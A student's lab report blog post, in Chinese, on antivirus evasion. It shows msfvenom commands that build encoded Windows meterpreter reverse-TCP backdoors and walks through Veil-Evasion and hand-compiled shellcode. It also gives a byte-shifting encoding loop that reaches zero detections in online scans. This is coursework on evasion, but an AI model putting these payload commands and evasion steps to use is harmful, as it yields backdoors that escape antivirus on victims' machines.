2. 程式人生 > >20155202張旭 Exp3 免殺原理與實踐

20155202張旭 Exp3 免殺原理與實踐

阿新 發佈:2018-04-09
ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理

20155202張旭 Exp3 免殺原理與實踐

AV廠商檢測惡意軟件的方式主流的就三種:

  • 基於特征碼的檢測
  • 啟發式惡意軟件檢測

  • 基於行為的惡意軟件檢測

    我們要做的就是讓我們的惡意軟件沒法被這三種方式找到,也就是免殺。具體的手段有:

改變特征碼

  • 依靠分片等方法嘗試找出特征碼區域,並對該區域代碼進行編碼
  • 加殼,使其無法進行逆向,比對病毒庫中的特征碼

改變行為方式:

  • 如果你手裏只有EXE
  • 有shellcode(像Meterpreter)

  • 有源代碼

    改變行為

  • 通訊方式
  • 操作模式

  • 例如之前註入所用到的反彈端口連接

    非常規方法

基礎問題回答

免殺是做什麽?

  • 防止被殺軟檢測出來

免殺的基本方法有哪些?

  • 1.改變特征碼
  • 2.加殼

開始實驗:

1.Msfvenom使用編碼器

  • Msfvenom是Metasploit平臺下用來編碼payloads免殺的工具。以Metaspliot的知名度和普及度。理所當然,所有AV廠家都盯著呢,一有新編碼算法,馬上就得加到特征庫裏。

編碼後呢,按理論上講,編碼會降低檢出率,大不了多編碼幾次,總會檢不出來。
一次編碼;

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.1.110 LPORT=5202 -f exe > 20155202.exe

  • 技術分享圖片

  • 很遺憾,剛生成就直接被360刪除了

  • 技術分享圖片

然後測試10次編碼,發現並沒卵子用。

 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -i 10 -b ‘\x00’ LHOST=192.168.1.110 LPORT=5202 -f exe > my_v1-10.exe
  • 技術分享圖片
  • 技術分享圖片

2veil-evasion

  • 我不會告訴你我安裝了一天的。
  • 這是一個和Metasploit
    類似的免殺平臺,Kali裏沒有
    在Kali終端中使用sudo apt-get install veil安裝

  • 技術分享圖片

  • 安裝完成後繼續安裝Veil-Evasion,好像像那麽回事

  • 技術分享圖片

  • 後面好像是在安裝python?但是好像出過錯,所以我最後直接刪除了pythen.
    技術分享圖片

  • 安裝完成後,我發現和別人的都不一樣,最後我抱著破罐子破摔的心態veil進入程序,然後一路按no,結果居然出現了正確的界面。

  • 在終端中使用```veil命令進入應用,輸入use evasion進入veil-evasion
    輸入use python/meterpreter/rev_tcp.py,然後設置回連IP和端口,生成後門文件:
  • 技術分享圖片

  • 技術分享圖片

  • 技術分享圖片

  • 技術分享圖片

  • 技術分享圖片
  • 真的尷尬,居然出錯了,很絕望,好在這時候我看了5201同學的博客,發現只要將use python/meterpreter/rev_tcp.py改成use c/meterpreter/rev_tcp.py
    後面一樣,然後生成了可執行文件,所以說大佬永遠是大佬。

  • 技術分享圖片

  • 看看Viruscan的掃描結果怎麽樣吧,這一步我並沒直接找到生成的文件,我用了 cp -r 要復制的文件夾絕對地址 /root 命令,將那個文件夾復制到主機root目錄下,取出來了.exe程序

  • 技術分享圖片

  • 掃描。

  • 技術分享圖片

比MSF進步了一些,但是還是有8個引擎檢測出來了有後門。

360不得不說稱得上王者啊!!!!

技術分享圖片

3. shellcode

Windows環境編譯

  • win7虛擬機不支持vs,所以這個實驗被迫在關了360的主機上做的,說實話,崩了好幾次,、在VS裏編輯編譯。

  • 技術分享圖片
  • 技術分享圖片

  • 技術分享圖片

  • 技術分享圖片
  • 編譯好後又無情查殺

  • 技術分享圖片

  • 回連先ping通,然後再做是沒有問題的

  • 技術分享圖片

  • 還是一樣用Viruscan和360掃描一下

  • 技術分享圖片

  • 真的是好了不少啊。

    4,.通過組合應用各種技術實現惡意代碼免殺

  • 我的加殼免殺很簡單,因為我認為如果一個算法很優秀,並不是以它的復雜程度來判別的,我運用了上一步中的shellcode的基礎上加上了我對每一位進行加一運算,出來了一個很醜的東西,我的算法是這樣的:

int main()
{
    int i;
    char a[500];
    for(i=1;i<500;i++)
    a[i]=met[i]+1;
for(i=0;i<500;i++)
    printf("%x",a[i]);
}
  • 技術分享圖片
  • 技術分享圖片
    經過一番細心梳理後完成了對其的編譯,看,是不是很漂亮:
  • 技術分享圖片
  • 然後去查殺一下 ,看看是不是很優秀,其實我還是很謙虛的,0%的報錯,安誰電腦裏都會很難受吧他們哈哈哈哈。
  • 技術分享圖片

離實戰還差哪些技術或步驟

  • 如何自動在別人電腦上把自己加密過的病毒解密釋放仍然是一個問題,現在的實驗歸根結底還是自己把東西拷到別人機器上,別人的ip地址都獲取不了,何談後面的一切?

    實驗體會

  • 這次實驗真的是花了兩天時間,veil的安裝問題百出,好在最後成功運行,這次實驗分了四個階段,讓我對病毒的認識有了進一步的提升,同時深刻看出了當今殺毒軟件的脆弱以及各殺毒軟件之間水平的差異,所以,謹慎小心對於我們這個行業的學生來說是非常重要並且安全威脅是近在眼前的!

20155202張旭 Exp3 免殺原理與實踐

相關推薦

20155202 Exp3 原理實踐

ever 難受 virus 分片 告訴 kali 基於 文件夾 梳理 20155202張旭 Exp3 免殺原理與實踐 AV廠商檢測惡意軟件的方式主流的就三種: 基於特征碼的檢測 啟發式惡意軟件檢測 基於行為的惡意軟件檢測 我們要做的就是讓我們的惡意軟件沒法被這三種方式找到

Exp3 原理實踐 ——20164316子遙

ping 開啟 後門 tro 技術 創建 判斷 問題 rev 一、實踐基本內容 1.實踐目標 (1) 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程 (2)通過組合應用各種技術實現惡意代

網絡對抗 Exp3 原理實踐 20154311 王卓然

下載軟件 get 改變 網站 加密 純手工 com 代碼 操作模式 Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? ①基於特征碼的檢測:AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是

2017-2018-4 20155317《網絡對抗技術》EXP3 原理實踐

運行 log jar idt 連通 進行 all 結果 暫時 2017-2018-4 20155317《網絡對抗技術》EXP3 免殺原理與實踐 一、問題回答 (1)殺軟是如何檢測出惡意代碼的? (2)免殺是做什麽? (3)免殺的基本方法有哪些? 2.實踐 (1) 正確

20154307《網絡對抗》Exp3 原理實踐

mark 我們 blocks 意思 釣魚 class 做了 更改權限 asio 20154307《網絡對抗》Exp3 免殺原理與實踐 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測:殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配,就會把該程

Exp3 原理實踐20154302薛師凡

代碼 AR 軟件 可執行文件 別了 模板生成 倒序 即使 get Exp3 免殺原理與實踐20154302薛師凡 一、實踐目標與內容 利用多種工具實現實現惡意代碼免殺 在另一臺電腦上,殺軟開啟的情況下,實現運行後門程序並回連成功。 在保證後門程序功能的情況下實現殺軟共存。

Exp3 原理實踐

asi 目標 專業 http lac 基礎 put 源文件 是個 一、基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? -檢測特征碼 -基於行為檢測 -啟發式檢測類似 (2)免殺是做什麽? 使惡意軟件不被AV檢

20155232《網絡對抗》Exp3 原理實踐

分享圖片 alt 特征碼 apt 基本 什麽 簡單介紹 主機 介紹 20155232《網絡對抗》Exp3 免殺原理與實踐 問題回答 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 基於特征碼的檢測 特征碼:一段特征碼就是一段或多段數據。 如果一個可執行文件(或其

20155320 Exp3 原理實踐

可執行 惡意代碼 執行 AR 後門 lock 函數 工具 文件復制 20155320 Exp3 免殺原理與實踐 免殺 一般是對惡意軟件做處理,讓它不被殺毒軟件所檢測。也是滲透測試中需要使用到的技術。 【基礎問題回答】 (1)殺軟是如何檢測出惡意代碼的? 1.通過行

20155219付穎卓 Exp3 原理實踐

但是 遇到 有一個 執行文件 圖書館 是個 alt .cn 現在 1.基礎問題回答 (1)殺軟是如何檢測出惡意代碼的? 殺毒軟件有一個病毒的特征碼庫,通過識別惡意代碼的特征碼或者特征片段檢測惡意代碼 殺毒軟件通過動態檢測對象文件的行為來識別惡意代碼,如果他的行為在一定程度

20155338《網絡對抗》Exp3 原理實踐

調用 編寫 上傳 權限 免殺 編譯運行 tcp 檢查 語言 20155338《網絡對抗》Exp3 免殺原理與實踐 實驗過程 一、免殺效果參考基準 Kali使用上次實驗msfvenom產生後門的可執行文件,上傳到老師提供的網址http://www.virscan.org/上進

2018-2019-2 網絡對抗技術 20165311 Exp3 原理實踐

col eno 比較 encode var 針對 name -s cnblogs 2018-2019-2 網絡對抗技術 20165311 Exp3 免殺原理與實踐 免殺原理及基礎問題回答 實驗內容 任務一:正確使用msf編碼器,msfvenom生成如j

2018-2019-2 網絡對抗技術 20165334 Exp3 原理實踐

語言 保護 r文件 原理 添加 ima port 復制 png 2018-2019-2 網絡對抗技術 20165334 Exp3 免殺原理與實踐 一、實驗內容 任務一正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,利用shellc

20165207 Exp3 原理實踐

編碼器 想要 功能 函數名 取值 generate 開始 重新 全局 Exp3 免殺原理與實踐 1、實驗內容 1.1、使用msf 1.1.1、 確定基準線 首先看kali的ip 直接msfvenom的結果,不加其他的東西: 使用VirusTotal得到的檢測這個程序得到

2018-2019-2 網絡對抗技術 20165210 Exp3 原理實踐

問題 網站 丟失 其他 圖片 https 壓縮包 exe 生成 2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐 免殺的概述 免殺,也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面,英文為Anti-AntiViru

20165120 Exp3 原理實踐 =v=

src sig rate 分享圖片 創建 殺毒軟件 port 執行文件 share Exp3 免殺原理與實踐: 1. 實踐內容(4分) 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5

2018-2019-2 網絡對抗技術 20165326 Exp3 原理實踐

log ant tool 能夠 校驗和 nco bin .html 錯誤代碼 免殺原理與實踐 目錄 知識點問答 實踐內容 遇到的問題 心得體會 知識點 meterpreter免殺 基礎問題回答 殺軟是如何檢測出惡意代碼的? 特征碼(基於簽名):模式匹配,比對特

20165214 2018-2019-2 《網絡對抗技術》Exp3 原理實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

20164317《網絡對抗技術》Exp3 原理實踐

實驗中遇到的問題 不同的 靜默安裝 組合 alt ping 程序 upx 上一個 一、實驗要求 1.1 正確使用msf編碼器(0.5分),msfvenom生成如jar之類的其他文件(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellco

20165229 NetSec Exp3原理實踐

可執行文件 沒有 哪些 .exe .com 三種 安全 基礎 net 20165229 NetSec Exp3免殺原理與實踐 實踐內容 1)正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或